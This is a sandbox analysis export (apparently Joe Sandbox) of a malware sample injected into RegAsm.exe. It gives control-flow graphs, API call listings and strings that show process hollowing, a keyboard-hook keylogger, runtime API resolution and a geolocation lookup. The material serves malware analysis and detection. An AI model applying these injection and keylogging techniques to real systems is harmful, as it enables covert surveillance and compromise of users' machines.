53856->53923 53860 4020df 11 API calls 53859->53860 53880 41bebf 53860->53880 53861 41bf2f 53862 401fd8 11 API calls 53861->53862 53863 41bf61 53862->53863 53864 401fd8 11 API calls 53863->53864 53867 41bf69 53864->53867 53865 41bf31 53868 4041a2 28 API calls 53865->53868 53866 4041a2 28 API calls 53866->53880 53869 401fd8 11 API calls 53867->53869 53870 41bf3d 53868->53870 53873 415ba1 53869->53873 53871 401fe2 28 API calls 53870->53871 53874 41bf46 53871->53874 53872 401fe2 28 API calls 53872->53880 53873->53789 53873->53790 53873->53851 53875 401fd8 11 API calls 53874->53875 53877 41bf4e 53875->53877 53876 401fd8 11 API calls 53876->53880 53878 41cec5 28 API calls 53877->53878 53878->53861 53880->53861 53880->53865 53880->53866 53880->53872 53880->53876 53929 41cec5 53880->53929 53965 441ed1 53881->53965 53884 402093 28 API calls 53885 415bd2 53884->53885 53886 41bb77 GetLastInputInfo GetTickCount 53885->53886 53886->53801 53974 436f10 53887->53974 53892 41bdaf 53893 41bdbc 53892->53893 53894 4020b7 28 API calls 53893->53894 53895 415c05 53894->53895 53895->53810 53896->53815 53897->53819 53898->53823 53900 402252 11 API calls 53899->53900 53901 401f12 53900->53901 53901->53840 53903 43bb45 _strftime 53902->53903 54028 43ae83 53903->54028 53905 415ceb 53905->53848 53905->53849 53906->53799 53908 404f65 53907->53908 53909 404fea 53907->53909 53910 404f6e 53908->53910 53911 404fc0 CreateEventA CreateThread 53908->53911 53912 404f7d GetLocalTime 53908->53912 53909->53789 53910->53911 53911->53909 54099 405150 53911->54099 53913 41bc1f 28 API calls 53912->53913 53914 404f91 53913->53914 54098 4052fd 28 API calls 53914->54098 53922->53799 53924 404243 53923->53924 53925 4023ce 11 API calls 53924->53925 53926 40424e 53925->53926 53927 402569 28 API calls 53926->53927 53928 4041b5 53927->53928 53928->53783 53930 41ced2 53929->53930 53931 41cf31 53930->53931 53935 41cee2 53930->53935 53932 41cf4b 53931->53932 53933 41d071 28 API calls 53931->53933 53949 41d1d7 28 API 
calls 53932->53949 53933->53932 53936 41cf1a 53935->53936 53940 41d071 53935->53940 53948 41d1d7 28 API calls 53936->53948 53937 41cf2d 53937->53880 53942 41d079 53940->53942 53941 41d0ab 53941->53936 53942->53941 53943 41d0af 53942->53943 53946 41d093 53942->53946 53960 402725 22 API calls 53943->53960 53950 41d0e2 53946->53950 53948->53937 53949->53937 53951 41d0ec __EH_prolog 53950->53951 53961 402717 22 API calls 53951->53961 53953 41d0ff 53962 41d1ee 11 API calls 53953->53962 53955 41d125 53956 41d15d 53955->53956 53963 402730 11 API calls 53955->53963 53956->53941 53958 41d144 53964 402712 11 API calls std::_Deallocate 53958->53964 53961->53953 53962->53955 53963->53958 53964->53956 53966 441edd 53965->53966 53969 441ccd 53966->53969 53968 41bc43 53968->53884 53970 441ce4 53969->53970 53972 441d1b pre_c_initialization 53970->53972 53973 44062d 20 API calls _abort 53970->53973 53972->53968 53973->53972 53975 41bb46 GetForegroundWindow GetWindowTextW 53974->53975 53976 40417e 53975->53976 53977 404186 53976->53977 53982 402252 53977->53982 53979 404191 53986 4041bc 53979->53986 53983 40225c 53982->53983 53984 4022ac 53982->53984 53983->53984 53990 402779 11 API calls std::_Deallocate 53983->53990 53984->53979 53987 4041c8 53986->53987 53991 4041d9 53987->53991 53989 40419c 53989->53892 53990->53984 53992 4041e9 53991->53992 53993 404206 53992->53993 53994 4041ef 53992->53994 54008 4027e6 53993->54008 53998 404267 53994->53998 53997 404204 53997->53989 53999 402888 22 API calls 53998->53999 54000 40427b 53999->54000 54001 404290 54000->54001 54002 4042a5 54000->54002 54019 4042df 22 API calls 54001->54019 54003 4027e6 28 API calls 54002->54003 54007 4042a3 54003->54007 54005 404299 54020 402c48 22 API calls 54005->54020 54007->53997 54009 4027ef 54008->54009 54010 402851 54009->54010 54013 4027f9 54009->54013 54027 4028a4 22 API calls 54010->54027 54014 402802 54013->54014 54016 402815 54013->54016 54021 402aea 54014->54021 54017 402813 54016->54017 54018 402252 
11 API calls 54016->54018 54017->53997 54018->54017 54019->54005 54020->54007 54022 402af4 __EH_prolog 54021->54022 54023 402e45 22 API calls 54022->54023 54025 402b60 54023->54025 54024 402252 11 API calls 54026 402bce 54024->54026 54025->54024 54026->54017 54044 43ba8a 54028->54044 54030 43aed0 54050 43a837 54030->54050 54032 43ae95 54032->54030 54033 43aeaa 54032->54033 54035 43aeaf pre_c_initialization 54032->54035 54049 44062d 20 API calls _abort 54033->54049 54035->53905 54037 43aedc 54038 43af0b 54037->54038 54058 43bacf 40 API calls __Toupper 54037->54058 54039 43af77 54038->54039 54059 43ba36 20 API calls 2 library calls 54038->54059 54060 43ba36 20 API calls 2 library calls 54039->54060 54042 43b03e _strftime 54042->54035 54061 44062d 20 API calls _abort 54042->54061 54045 43baa2 54044->54045 54046 43ba8f 54044->54046 54045->54032 54062 44062d 20 API calls _abort 54046->54062 54048 43ba94 pre_c_initialization 54048->54032 54049->54035 54051 43a854 54050->54051 54057 43a84a 54050->54057 54051->54057 54063 448295 GetLastError 54051->54063 54053 43a875 54084 4483e4 36 API calls __Getctype 54053->54084 54055 43a88e 54085 448411 36 API calls __cftoe 54055->54085 54057->54037 54058->54037 54059->54039 54060->54042 54061->54035 54062->54048 54064 4482b7 54063->54064 54065 4482ab 54063->54065 54087 445b74 20 API calls 3 library calls 54064->54087 54086 44883c 11 API calls 2 library calls 54065->54086 54068 4482b1 54068->54064 54070 448300 SetLastError 54068->54070 54069 4482c3 54071 4482cb 54069->54071 54094 448892 11 API calls 2 library calls 54069->54094 54070->54053 54088 446802 54071->54088 54073 4482e0 54073->54071 54076 4482e7 54073->54076 54075 4482d1 54077 44830c SetLastError 54075->54077 54095 448107 20 API calls _abort 54076->54095 54096 446175 36 API calls 4 library calls 54077->54096 54079 4482f2 54081 446802 _free 20 API calls 54079->54081 54083 4482f9 54081->54083 54082 448318 54083->54070 54083->54077 54084->54055 54085->54057 54086->54068 
54087->54069 54089 44680d HeapFree 54088->54089 54093 446836 _free 54088->54093 54090 446822 54089->54090 54089->54093 54097 44062d 20 API calls _abort 54090->54097 54092 446828 GetLastError 54092->54093 54093->54075 54094->54073 54095->54079 54096->54082 54097->54092 54102 40515c 102 API calls 54099->54102 54101 405159 54102->54101 54103 44839e 54111 448790 54103->54111 54107 4483c7 54108 4483ba 54108->54107 54119 4483ca 11 API calls 54108->54119 54110 4483b2 54112 44854a _abort 5 API calls 54111->54112 54113 4487b7 54112->54113 54114 4487cf TlsAlloc 54113->54114 54115 4487c0 54113->54115 54114->54115 54116 43502b ___crtLCMapStringA 5 API calls 54115->54116 54117 4483a8 54116->54117 54117->54110 54118 448319 20 API calls 3 library calls 54117->54118 54118->54108 54119->54110 54120 100020db 54123 100020e7 ___scrt_is_nonwritable_in_current_image 54120->54123 54121 100020f6 54122 10002110 dllmain_raw 54122->54121 54124 1000212a 54122->54124 54123->54121 54123->54122 54128 1000210b 54123->54128 54133 10001eec 54124->54133 54126 10002177 54126->54121 54127 10001eec 29 API calls 54126->54127 54129 1000218a 54127->54129 54128->54121 54128->54126 54130 10001eec 29 API calls 54128->54130 54129->54121 54131 10002193 dllmain_raw 54129->54131 54132 1000216d dllmain_raw 54130->54132 54131->54121 54132->54126 54134 10001ef7 54133->54134 54135 10001f2a dllmain_crt_process_detach 54133->54135 54136 10001f1c dllmain_crt_process_attach 54134->54136 54137 10001efc 54134->54137 54142 10001f06 54135->54142 54136->54142 54138 10001f01 54137->54138 54139 10001f12 54137->54139 54138->54142 54143 1000240b 25 API calls 54138->54143 54144 100023ec 27 API calls 54139->54144 54142->54128 54143->54142 54144->54142 54145 434918 54146 434924 ___FrameUnwindToState 54145->54146 54172 434627 54146->54172 54148 43492b 54150 434954 54148->54150 54478 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54148->54478 54157 
434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54150->54157 54183 4442d2 54150->54183 54154 434973 ___FrameUnwindToState 54161 4349f3 54157->54161 54479 443487 36 API calls 4 library calls 54157->54479 54191 434ba5 54161->54191 54173 434630 54172->54173 54484 434cb6 IsProcessorFeaturePresent 54173->54484 54175 43463c 54485 438fb1 54175->54485 54177 434641 54178 434645 54177->54178 54494 44415f 54177->54494 54178->54148 54181 43465c 54181->54148 54185 4442e9 54183->54185 54184 43502b ___crtLCMapStringA 5 API calls 54186 43496d 54184->54186 54185->54184 54186->54154 54187 444276 54186->54187 54188 4442a5 54187->54188 54189 43502b ___crtLCMapStringA 5 API calls 54188->54189 54190 4442ce 54189->54190 54190->54157 54192 436f10 ___scrt_get_show_window_mode 54191->54192 54193 434bb8 GetStartupInfoW 54192->54193 54194 4349f9 54193->54194 54195 444223 54194->54195 54544 44f0d9 54195->54544 54197 44422c 54199 434a02 54197->54199 54548 446895 36 API calls 54197->54548 54200 40ea00 54199->54200 54678 41cbe1 LoadLibraryA GetProcAddress 54200->54678 54202 40ea1c GetModuleFileNameW 54683 40f3fe 54202->54683 54204 40ea38 54205 4020f6 28 API calls 54204->54205 54206 40ea47 54205->54206 54207 4020f6 28 API calls 54206->54207 54208 40ea56 54207->54208 54209 41beac 28 API calls 54208->54209 54210 40ea5f 54209->54210 54698 40fb52 54210->54698 54212 40ea68 54213 401e8d 11 API calls 54212->54213 54214 40ea71 54213->54214 54215 40ea84 54214->54215 54216 40eace 54214->54216 54896 40fbee 118 API calls 54215->54896 54217 401e65 22 API calls 54216->54217 54219 40eade 54217->54219 54223 401e65 22 API calls 54219->54223 54220 40ea96 54221 401e65 22 API calls 54220->54221 54222 40eaa2 54221->54222 54897 410f72 36 API calls __EH_prolog 54222->54897 54224 40eafd 54223->54224 54225 40531e 28 API calls 54224->54225 54227 40eb0c 54225->54227 54229 406383 28 API calls 54227->54229 54228 40eab4 54898 40fb9f 78 API calls 54228->54898 54231 40eb18 54229->54231 54233 401fe2 28 
Control-flow graph export (Joe Sandbox IDA Plugin): the page carried the graph as a flat edge list of internal node ids (e.g. 54231->54233) paired with the code address of each node. The rendered graph is not reproducible here; what survives is which addresses the plugin annotated with API calls or symbol names, grouped below by image.

Main image (module at 0x400000):
- Wrapper nodes counted by call volume: 40eabd -> 40f3eb (71 API calls); 401fd8, 401e8d, 402163, 4020df, 401f09 (11 API calls each); 401e65 (22); 401fc0, 401fe2, 4020b7, 4020f6, 4032a0, 403014, 40417e, 40431d, 402f10, 402f31, 402ea1, 4041a2, 40b93f, 41bdaf, 41bc1f, 41beac (28 each); 4139e4 (30); 40da23 (32); 41c516 (32); 4185a3 (31); 41ba09 (43); 4124b0 (65, ___scrt_get_show_window_mode); 4042fc (84); 404aa1 (61); 404e26 (99).
- Registry: 413584 RegOpenKeyExA; 4135ae RegQueryValueExA, RegCloseKey.
- Runtime import resolution: 41cc10 GetModuleHandleA, GetProcAddress; 41cc20 and 41cc39 LoadLibraryA, GetProcAddress; 41cc49 (44 API calls). This is the routine whose API list follows.
- Resources: 41b539 FindResourceA; 41b556 LoadResource, LockResource, SizeofResource.
- 4129da path: 412aef GetModuleFileNameW, then a loop at 412b32 with Sleep at 412c58, 412cfa, 412d9c, 412e88, 412ecd and DeleteFileW at 412dff, 412e36, 412e72.
- 4132a6 transfers into the DLL image at 10001c5b (see below).
- Network: 426d59 send.
- 4117d7-4120b2 block: 411dac GetNativeSystemInfo; 411cde VirtualAlloc; 411cf5 VirtualFree; 411e47 GetProcessHeap, HeapAlloc; 4120b2 GetProcessHeap, HeapFree; 4118ed and 411971 VirtualProtect; 411bbb and 411c8a IsBadReadPtr; 4117db, 411d6d, 411dff, 411ca7, 411cbd, 411f60 SetLastError; 411fa2 (22 API calls, new).
- CRT helpers (plugin symbols such as try_get_function, ___crtLCMapStringA, ___vcrt_initialize_winapi_thunks, _abort, _free, FindHandlerForForeignException): 438d53 GetProcAddress; 438dbb and 438de2 LoadLibraryExW; 438dd7 GetLastError; 438e06 FreeLibrary; 438e46 TlsAlloc; 438f36 InitializeCriticalSectionAndSpinCount; 43a4f6 DeleteCriticalSection; 445909 EnterCriticalSection; 44f188 LeaveCriticalSection; 4461e1 RtlAllocateHeap; 44ed8d GetOEMCP; 44eda4 GetACP; 44f209 IsValidCodePage; 44f21b and 44ee44 GetCPInfo; 4511cc, 451270, 44ad0a, 44ad9e MultiByteToWideChar; 45128c GetStringTypeW; 44ae9d WideCharToMultiByte; 448ca3 LCMapStringW.

DLL image (module at 0x10000000):
- 10001c5b -> 100012ee -> 100013b7 GetEnvironmentVariableW, then repeated calls into 100010f1 (51 API calls), which does 10001129/10001168/10001177 lstrlenW, 10001148 lstrcatW, 10001177 FindFirstFileW, 100011c7 FindNextFileW, 100011da FindClose; string building at 100014b5/100014d9 lstrlenW and 10001501/10001539/1000156b/1000159d lstrlenW, lstrcatW.
- CRT startup: 100022b1 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (___get_entropy); 10002639 and 100023de IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter; 100022fc RtlInitializeSListHead; 10002933 IsProcessorFeaturePresent; 10003972 RtlDeleteCriticalSection; 10003b24 and 10005d9b TlsAlloc; 100039ea and 10003a38 LoadLibraryExW; 10003a05 GetLastError; 10003a60 FreeLibrary.

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
• LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
• LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
• LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                  • API String ID: 4236061018-3687161714
                                                                                                                                                                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

Control-flow Graph (interactive graph rendering, not reproduced here)
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
• GetProcAddress.KERNEL32(00000000), ref: 00418174
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
• GetProcAddress.KERNEL32(00000000), ref: 00418188
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
• GetProcAddress.KERNEL32(00000000), ref: 0041819C
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
• GetProcAddress.KERNEL32(00000000), ref: 004181B0
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
• GetThreadContext.KERNEL32(?,00000000), ref: 00418280
• ReadProcessMemory.KERNEL32 ref: 004182A6
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
• NtClose.NTDLL(?), ref: 00418332
• TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
• WriteProcessMemory.KERNEL32 ref: 00418446
• SetThreadContext.KERNEL32(?,00000000), ref: 00418463
• ResumeThread.KERNEL32(?), ref: 00418470
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
• GetCurrentProcess.KERNEL32(?), ref: 00418492
• NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
• NtClose.NTDLL(?), ref: 004184A3
• TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
• GetLastError.KERNEL32 ref: 004184B5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 316982871-3035715614
• Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
• Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
• Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
• Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

Control-flow Graph (interactive graph rendering, not reproduced here)
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetMessageA.USER32 ref: 0040A376
• TranslateMessage.USER32(?), ref: 0040A385
• DispatchMessageA.USER32(?), ref: 0040A390
Strings
• Keylogger initialization failure: error , xrefs: 0040A33C
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
• Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
• Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
• Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

Control-flow Graph (interactive graph rendering, not reproduced here)
APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Control-flow Graph
• Node 1747: 41b411-41b454, call 4020df, call 43bda0, InternetOpenW, InternetOpenUrlW; successor 1752
• Node 1752: 41b456-41b477, InternetReadFile; successors 1753, 1754
• Node 1753: 41b479-41b499, call 4020b7, call 403376, call 401fd8; successor 1754
• Node 1754: 41b49d-41b4a0; successors 1755, 1756
• Node 1755: 41b4a2-41b4a4; successors 1752 (read loop), 1756
• Node 1756: 41b4a6-41b4b3, InternetCloseHandle * 2, call 43bd9b; successor 1760
• Node 1760: 41b4b8-41b4c2
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
• InternetCloseHandle.WININET(00000000), ref: 0041B4AD
• InternetCloseHandle.WININET(00000000), ref: 0041B4B0
Strings
• http://geoplugin.net/json.gp, xrefs: 0041B448
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
• Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
• Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
• Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
APIs
• Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
• SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
• GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
• Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
• Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
• Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
Memory Dump Source
